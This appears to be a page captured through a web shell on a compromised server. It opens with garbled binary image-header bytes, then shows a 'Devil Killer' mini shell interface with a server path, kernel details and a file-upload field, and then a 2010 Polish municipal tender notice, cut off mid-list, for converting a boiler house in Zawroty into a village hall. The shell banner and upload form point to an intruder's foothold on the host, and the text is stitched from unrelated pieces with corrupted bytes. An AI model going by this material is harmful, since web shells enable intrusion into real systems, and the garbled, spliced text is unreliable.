JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100910/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100910/285732-N-2010.html

<p class="kh_header"><b>Morąg: Adaptacja budynku po byłej kotłowni na świetlicę wiejską w Zawrotach</b><br>
<b>Numer ogłoszenia: 285732 - 2010; data zamieszczenia: 10.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Morągu , ul. 11 Listopada 9, 14-300 Morąg, woj. warmińsko-mazurskie, tel. 089 7572231, faks 089 7572120.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.morag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Adaptacja budynku po byłej kotłowni na świetlicę wiejską w Zawrotach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wspólny Słownik Zamówień: 45110000-1; 45112000-5; 45223500-1; 45223200-8; 45261000-4; 45420000-7; 45430000-0; 45410000-4; 45440000-3; 45331200-8; 45261320-3; 45261000-4; 45400000-1; 45450000-6; 45332300-6; 45332400-7; 45332200-5; 45331100-7; 45315000-8; 45333000-0; 45310000-3; 45320000-6
Przedmiotem inwestycji jest adaptacja byłej kotłowni osiedlowej na świetlicę wiejską, budowa pochylni dla osób niepełnosprawnych oraz budowa  podziemnego zbiornika na gaz płynny o pojemności V=2700 l z przyłączem gazowym na działce nr 407/3 w miejscowości Zawroty, gm. Morąg. 

Branża budowlana
Istniejący budynek należy przykryć dachem dwuspadowym o kątach nachylenia połaci 13 i 20 stopni. Pokrycie dachu blachodachówka z posypką kwarcową. 
 W budynku zaprojektowano w piwnicy salę główną dostępną bezpośrednio poprzez wejście z terenu ; w sali nie przewiduje się stałych miejsc pracy, długość przebywania osób 2-4 godzin . W świetlicy znajduje się scena ( posadzka podniesiona o 54 cm w stosunku do posadzki sali)  oraz wejście do pomieszczenia gospodarczego i do nieużytkowanego pomieszczenia dawnego składu opału. Sala  łączy się z komunikacją zaplecza gdzie zaprojektowano  pomieszczenie socjalne i sanitariaty oraz schodami prowadzącymi na parter budynku. Na parterze budynku znajduje się pokój komputerowy, sanitariaty oraz pom. techniczne. 
Budynek dostępny jest dla osób niepełnosprawnych poprzez projektowaną pochylnię dla wózków przy wejściu do sali głównej i na parter. Wejście główne i  wejście na parter zadaszone dachem  z płyt akrylowych na konstrukcji stalowej nierdzewnej w kształcie łuku. Usytuowanie wejścia głównego do świetlicy  bez zmian. 
W części istniejącej budynku zaprojektowano wymianę istniejącej stolarki okiennej  i drzwiowej na PCV ; wymianę posadzek; wentylację grawitacyjną; docieplenie ścian istniejących z wykonaniem wyprawy tynkarskiej; wymianę docieplenia stropodachów z wykonaniem nowego pokrycia dachem dwuspadowym, wykonanie nowej nawierzchni z kostki betonowej na tarasie wejściowym na parter budynku.   
Teren przed wejściem do budynku wyłożyć kostką betonową w kolorze szarym i żółtym gr. 8 cm na podbudowie ze żwiru gr. 30 cm i podsypce z piasku gr. 5 cm . 

Ogrodzenie zbiornika podziemnego na gaz płotem z siatki stalowej powlekanej na słupkach stalowych. Ogrodzenie zaopatrzyć w dwie furtki wejściowe na dwóch przeciwległych bokach. Wysokość ogrodzenia 1,80 m.

Branża sanitarna
Inst. solarna
Dwa kolektory solarne ustawione kątowo ( 45 stopni ) i połączone równolegle na dachu świetlicy wiejskiej ukierunkowane w kierunku południowym. Ze względu na wagę własną zestawu kolektorów solarnych wynoszącą około 100 kg należy przewidzieć odpowiednią konstrukcję nośną.
Rurociągi technologiczne wykonać z rur stalowych podwójnie ocynkowanych łączonych na gwint uszczelnienie z konopi lub z rur miedzianych łączonych beztopnikowym lutem twardym L-Ag2P lub L-CuP6.

Inst. wod.-kan.
Zaopatrzenie budynku w wodę odbywać się będzie z istniejącego przyłącza wodociągowego.
Rurociągi instalacji zimnej wykonać należy z rur stalowych ocynkowanych. Przewody zimnej wody prowadzić należy w bruzdach ścian, podejścia również umieścić należy w bruzdach.
Instalację ciepłej wody wykonać należy z rur stalowych podwójnie ocynkowanych. Zadaniem instalacji będzie doprowadzenie ciepłej wody do armatury czerpalnej. Przygotowanie ciepłej wody dla świetlicy wiejskiej odbywać się będzie za pośrednictwem zasobnika c.w.u. zasilanego z kotła grzewczego zasilanego gazem płynnym.
Obecnie istniejący budynek wyposażony jest w przyłącze kanalizacyjne za pośrednictwem którego odprowadzane są ścieki sieci kanalizacyjnej. Odprowadzenie ścieków gospodarczo - bytowych z budynku odbywać się będzie poprzez istniejące przyłącze kanalizacji sanitarnej sieci kanalizacyjnej. Ze względu na to, że wyjście kanalizacji z budynku znajduje się 10 cm nad poziomem projektowanej posadzki piwnicy rurociągi prowadzić po ścianach w bruzdach lub w przypadku braku takiej możliwości po powierzchni ścian. Rurociągi zabudować w obu przypadkach.
Odprowadzenie ścieków z kompaktów na poziomie piwnicy odbywać się będzie za pośrednictwem pompo - rozdrabniaczy.
Montażu urządzeń należy dokonać zgodnie z instrukcją producenta. Instalację kanalizacyjną odprowadzającą ścieki z pompo - rozdrabniaczy wykonać z rur PE dn 32 mm piony i dn 40 mm poziomy włączone do pionów kanalizacyjnych.
Odprowadzenie ścieków z kratek ściekowych K1, K2, K3 odbywać się za pośrednictwem instalacji ułożonej w ziemi pod posadzką piwnicy i podłączonej do
szczelnej studzienki PE dn 415 mm. Studzienka będzie miała głębokość 1,5 m i pojemność użytkową V = 150 l. W celu odprowadzenia ścieków projektuje się zanurzeniową pompę wody z włącznikiem pływakowym.
Odprowadzenie ścieków ze studzienki za pośrednictwem elastycznego węża podłączonego do pompy i do istniejącego pionu kanalizacyjnego, który należy zdemontować i zastąpić nowym PCV dn 110 mm. Przewody w ziemi i ponad posadzką wykonać należy z rur PCV i łączyć metodą wciskową.
Wszystkie przybory kanalizacyjne odprowadzające ścieki należy zaopatrzyć w zamknięcia wodne - syfony, które są niezbędne ze względu na możliwość przedostania się gazów kanałowych do wewnątrz budynku.
Inst. gazowa wewnętrzna
Zaopatrzenie świetlicy wiejskiej w ciepło odbywać się będzie za pośrednictwem kotła grzewczego projektowanego w pomieszczeniu technicznym na poziomie parteru.
Projektuje się kocioł grzewczy jednofunkcyjny z zamkniętą komorą spalania. W pomieszczeniu, w którym zlokalizowano kocioł gazowy należy wykonać kanał wentylacji nawiewno - wywiewnej o wymiarach 20 cm x 20 cm bez możliwości zakrycia zamontowany w ścianie na wysokości max 5 cm nad posadzką pomieszczenia technicznego wyprowadzony kanałem o wym. 20 x 20 cm ze spadkiem max 0,5% w kierunku na zewnątrz budynku i wyprowadzonym nad poziomem terenu.

Inst. zbiornikowa
Zbiornik usytuowany będzie od północnej strony budynku w odległości od jej ścian zewnętrznych 2,5 m i 1,5 m od najbliższej granicy posesji.
Podziemny zbiornik o pojemności 2.700 l tworzy zaplecze paliwowe i zasilać będzie urządzenia grzewcze w byłej kotłowni adaptowanej na świetlicę wiejską. Rurociągi zewnętrzne wykonać należy z rur polietylenowych HDPE SDR 11 dn 32 mm, łączonych metodą zgrzewania elektrofuzyjnego za pomocą typowych elektrokształtek PE o napięciu roboczym 24 V lub 39,5 V.
Rurociągi średniego i niskiego ciśnienia w części naziemnej należy wykonać z rur stalowych bez szwu kl. R lub R35, łączonych przez spawanie. Dopuszcza się stosowanie połączeń gwintowanych wyłącznie przy połączeniach z armaturą. Jako uszczelnienie należy używać taśmy teflonowej do gazu. Za pomocą reduktora I - ego stopnia zamontowanego na zbiorniku przeprowadzana jest redukcja wysokiego ciśnienia gazu do ciśnienia średniego.

Inst. c.o.
Ogólne zapotrzebowanie ciepła na cele centralnego ogrzewania, ciepłej wody użytkowej oraz wentylacji około 20.000 W.
Przyjęto kocioł grzewczy z zamkniętą komorą spalania komorą spalania o mocy Qmax = 24 kW zasilany gazem płynnym propanem. Parametry czynnika grzejnego 75o/65oC.
Obieg czynnika grzejnego wymuszony.
Projektuje się instalację centralnego ogrzewania w systemie rozdzielaczowym. Instalację c.o. wykonać należy w pomieszczeniu technicznym i do rozdzielaczy z rur i kształtek
stalowych czarnych bez szwu lub stalowych łączonych na bazie kształtek zaciskowych natomiast w pozostałych pomieszczeniach z rur wielowarstwowych łączonych na bazie kształtek zaciskowych.
Jako aparaty grzejne zaprojektowano grzejniki płytowe z elementami konwekcyjnymi i wbudowanym wkładkami zaworów termostatycznych wg normy PN-EN 442 dla parametrów 75O/65O/20OC.
Grzejniki posiadają wbudowany zestaw przyłączeniowy umożliwiający zasilenie grzejnika z boku.

Branża elektryczna

- demontaż starej instalacji elektrycznej
Istniejącą instalację elektryczną budynku byłej kotłowni należy w całości zdemontować. Demontaż rozpocząć od demontażu istniejącego przyłącza 4xALY16mm2 i demontażu stojaka dachowego (projekt przewiduje przebudowę dachu budynku).

- zasilanie w energię elektryczną
Na szczytowej ścianie wyremontowanego budynku świetlicy, w miejscu
wskazanym na planie rys. Nr E-1 i E-4 zamontować szafkę złączowo-pomiarową SZP typu ZNTLR. Linię zasilającą od nowego stojaka dachowego, ze śrubą hakową, do szafki SZP wykonać przewodem YDY4x10mm2  w RL37 p/t. Zalicznikową linię zasilającą z SZP do tablicy rozdzielczej TG wykonać przewodem YDY5x10mm2  w RL37 p/t. Podziału punktu PEN na N i PE wykonać w szafce złączowo-pomiarowej SZP. Wykonać uziemienie punktu PEN łącząc go bednarką stalową-ocynkowaną z uziomem pionowym, głębinowym i uziomem instalacji piorunochronnej.  Oporność uziomu nie może przekraczać 30 om.  Z tablicy rozdzielczej TG wyprowadzić projektowane obwody.

- instalacja oświetleniowa
Całość instalacji oświetleniowej zaprojektowano przewodami typu YDY  3-żyłowymi, z żyłą ochronną  PE,  o przekrojach podanych na schemacie zasilania i planie instalacji, układanymi w tynku w ścianach tradycyjnych murowanych i w rurkach izolacyjnych niepalnych układanych pod płytami z suchego tynku w ścianach o konstrukcji drewnianej, szkieletowej. Wykaz opraw znajduje się na rzucie przyziemia rys. Nr E-6.  W pomieszczeniu technicznym, pom. porządkowym  i  WC stosować osprzęt szczelny. Doprowadzenie przewodów do opraw oświetleniowych na drewnianych sufitach wykonać w rurkach  izolacyjnych niepalnych. Na stropach palnych, drewnianych  wolno mocować wyłącznie oprawy oznaczone  symbolem F. Łączniki instalować na wysokości  1,4m  nad podłogą a w WC dla  niepełnosprawnych na wys. 1,0m.

- instalacja oświetlenia awaryjnego
W sali głównej świetlicy, pokoju komputerowym i w korytarzu zaprojektowano oświetlenie ewakuacyjne za pomocą montażu opraw  oświetleniowych z inwerterem  typu  OKN 236N Aw3.  Nad wyjściami z pomieszczeń sali głównej świetlicy, pokoju komputerowego i korytarzy należy zainstalować oprawy ewakuacyjne kierunkowe. 

- instalacja gniazd wtyczkowych
Całość instalacji gniazd wtyczkowych zaprojektowano przewodami typu YDY  3-żyłowymi, z żyłą ochronną  PE,  o przekrojach podanych na schemacie zasilania i planie instalacji, układanymi  w tynku w ścianach tradycyjnych murowanych i w rurkach izolacyjnych niepalnych układanych pod płytami z suchego tynku w ścianach o konstrukcji drewnianej, szkieletowej. W  WC, w pom. technicznym i pom. porządkowym stosować osprzęt szczelny. Gniazda wtyczkowe  instalować na wysokości  0,9m w pom. technicznym i w zapleczu gospodarczym, 1,0m w WC dla niepełnosprawnych, 1,4m w WC, natomiast  w  sali głównej świetlicy, na scenie i w pokoju komputerowym na wysokości 0,30 m  nad  podłogą. Przewidziano wykonanie sześciu oddzielnych obwodów z gniazdami innego koloru dla zasilania komputerów i rutera.

- instalacja komputerowa
Instalację sieci komputerowej w czytelni dla dorosłych wykonać przewodami UPT kat. 5e  4x2x0,5  w RL  układanymi pod tynk. Stosować osprzęt pod tynkowy. Gniazda do zasilenia komputerów montować na wysokości 0,3 m od posadzki a gniazdo do zasilenia rutera na wysokości 1,5 m. Obwody sieci komputerowej wyprowadzić 6-cio portowego panelu z 6-cioma modułami keystone RJ45 TK zamontowanego na wysokości 1,5m w miejscu wskazanym na planie rys. Nr E-8. Stosować gniazda sieciowe RJ45.

- instalacja telefoniczna
Wykonanie instalacji polega na ułożeniu obwodu telefonicznego przewodem YTKSY 1x4x0,7 w RL p/t od  puszki przyłączeniowej na zewnętrznej ścianie budynku  do modemu zamontowanego w pokoju komputerowym.  Stosować osprzęt podtynkowy.

- instalacja alarmowa
Zasilanie centrali alarmowej zlokalizowanej w korytarzu budynku, wykonać przewodem  typu  YDY3x2,5 mm2  p/t z tablicy rozdzielczej TG

- instalacja telefoniczna
Zadaniem instalacji alarmowej jest sygnalizacja włamań do pomieszczeń świetlicy. Całość instalacji alarmowej zaprojektowano przewodami typu YDTY   o przekrojach 0,5mm2 w RL lub RVKL p/t  i ilości żył podanych na schemacie rys. Nr E-11. Dopuszcza się zastosowanie przewodu wielożyłowego z odejściem poszczególnych par żył do poszczególnych przyborów instalacji takich jak PCP - pasywne czujniki podczerwieni, M-manipulator, sygnalizatory  zewnętrzny i wewnętrzny i N - nadajnik GSM zainstalowanych w miejscach wskazanych na planie rys. Nr E-9 i E-10. Obwody do poszczególnych czujek i sygnalizatorów wyprowadzić z centrali alarmowej zlokalizowanej w korytarzu budynku.
Ponadto:
- instalacja ochrony od przepięć atmosferycznych i łączeniowych
- instalacja przeciwporażeniowa,
- instalacja piorunochronna.
Wykonawca zobowiązany jest do wykonania i zafakturowania w 2010 roku części robót będących przedmiotem umowy jednak do kwoty nie większej niż 85 000,00zł brutto.
Szczegółowy zakres przedmiotu zamówienia opisuje dokumentacja projektowa, przedmiary robót, specyfikacja techniczna wykonania i odbioru robót budowlanych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu zamówień tego samego rodzaju, zgodnie z art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.00.00-1, 45.11.20.00-5, 45.22.35.00-1, 45.22.32.00-8, 45.26.10.00-4, 45.42.00.00-7, 45.43.00.00-0, 45.41.00.00-4, 45.44.00.00-3, 45.33.12.00-8, 45.26.13.20-3, 45.26.10.00-4, 45.40.00.00-1, 45.45.00.00-6, 45.33.23.00-6, 45.33.24.00-7, 45.33.22.00-5, 45.33.11.00-7, 45.31.50.00-8, 45.33.30.00-0, 45.31.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości: 12 000.00 PLN (słownie:  dwanaście tysięcy 00/100 PLN)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy na zał. nr 1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy na zał. nr 1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy na zał. nr 1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami - Załącznika nr 2.
Dysponowanie osobą, której zamierza powierzyć funkcję kierownika budowy do:
- kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów
- kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów
- do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji, urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub odpowiadającymi im lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów
- do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadającymi im, ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
Zamawiający uzna, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówie?nia, jeżeli suma ubezpieczenia wynikająca z polisy lub innego dokumentu ubezpieczenia nie będzie niższa niż 300 000,00zł.
W przypadku składania oferty wspólnej ww. dokumenty składa każdy z wykonawców składających ofertę wspólną. Warunek wysokości sumy ubezpieczenia zostanie uznany przez zamawiającego za spełniony, jeżeli wykonawcy składający ofertę wspólną będą spełniać go łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

